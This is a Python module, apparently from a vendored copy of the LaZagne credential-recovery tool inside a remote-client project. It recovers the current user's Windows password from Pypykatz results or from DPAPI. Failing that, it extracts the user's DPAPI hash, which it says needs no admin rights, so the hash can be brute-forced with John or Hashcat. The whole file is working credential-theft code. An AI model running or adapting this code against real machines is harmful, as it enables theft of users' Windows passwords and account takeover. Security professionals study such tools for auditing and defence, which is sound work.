blob: 7527f3cfdd48ee9f7d843e8bf3fe4aed6cc9be36 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
# -*- coding: utf-8 -*-
try:
import _winreg as winreg
except ImportError:
import winreg
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import OpenKey, HKEY_LOCAL_MACHINE
from foreign.client_handling.lazagne.config.constant import constant
from foreign.client_handling.lazagne.config.users import get_username_winapi
class WindowsPassword(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'windows', 'windows')
self.current_user = get_username_winapi()
def is_in_domain(self):
"""
Return the context of the host
If a domain controller is set we are in an active directory.
"""
try:
key = OpenKey(HKEY_LOCAL_MACHINE, r'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\')
val, _ = winreg.QueryValueEx(key, 'DCName')
winreg.CloseKey(key)
return val
except Exception:
return False
def run(self):
"""
- Check if the user password has already be found using Pypykatz
- If not, check if a password stored in another application is also used as windows password
- Windows password not found, return the DPAPI hash (not admin priv needed) to bruteforce using John or Hashcat
"""
# Check if password has already been found
if constant.pypykatz_result.get(self.current_user, None):
if 'Password' in constant.pypykatz_result[self.current_user]:
# Password already printed on the Pypykatz module - do not print it again
self.info('User has already be found: {password}'.format(
password=constant.pypykatz_result[self.current_user]['Password'])
)
return
# Password not already found
pwd_found = []
if constant.user_dpapi and constant.user_dpapi.unlocked:
# Check if a password already found is a windows password
password = constant.user_dpapi.get_cleartext_password()
if password:
pwd_found.append({
'Login': constant.username,
'Password': password
})
else:
# Retrieve dpapi hash used to bruteforce (hash can be retrieved without needed admin privilege)
# Method taken from Jean-Christophe Delaunay - @Fist0urs
# https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf
self.info(
u'Windows passwords not found.\n'
u'Try to bruteforce this hash (using john or hashcat)'
)
if constant.user_dpapi:
context = 'local'
if self.is_in_domain():
context = 'domain'
h = constant.user_dpapi.get_dpapi_hash(context=context)
if h:
pwd_found.append({
'Dpapi_hash_{context}'.format(context=context): constant.user_dpapi.get_dpapi_hash(
context=context)
})
return pwd_found
|